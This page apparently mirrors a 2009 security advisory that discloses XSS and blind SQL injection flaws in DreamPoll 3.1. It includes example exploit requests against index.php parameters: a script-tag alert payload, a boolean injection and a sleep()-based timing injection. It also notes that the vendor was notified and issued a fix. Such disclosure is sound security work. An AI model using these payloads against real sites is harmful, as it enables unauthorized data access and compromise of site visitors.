Lucene search
K

DreamPoll 3.1 SQL Injection / XSS

🗓️ 08 Oct 2009 00:00:00Reported by mark from infosecstuffType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

During security audit, discovered XSS and SQL Injection vulnerabilities in DreamPoll 3.1 software by Dreamlevels, allowing unauthorized changes and client compromise

Code
`During a recent security audit of the DreamPoll 3.1 software by Dreamlevels, I discovered a number of XSS and SQL Injection vulnerabilities in the application. These vulnerabilities could be exploited to make unauthorized changes to a web site or compromise a client accessing a site that utilizes the application. Details of the vulnerabilities are as follows:  
  
XSS  
————————-  
File: index.php  
Variable: recordsPerPage  
Example: GET /index.php?action=loginsortField=poll_default&sortDesc=1&recordsPerPage=1>”><ScRiPt%20%0d%0a>alert(911)%3B</ScRiPt>  
  
Blind SQL/Xpath Injection  
————————-  
File: index.php  
Variable: sortField  
Example: GET /index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20  
  
Blind SQL Injection (Timing)  
————————-  
File: index.php  
Variables: sortField, sortDesc, pageNumber  
Example: GET /index.php?action=loginsortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20  
  
While not specifically tested, it is likely these vulnerabilities exist in earlier versions of this application as well. The vendor was notified on 09/28/2009 and a fix was released the same day. If you are a current user of this software, contact the vendor for the available fix.  
  
http://www.infosecstuff.com  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation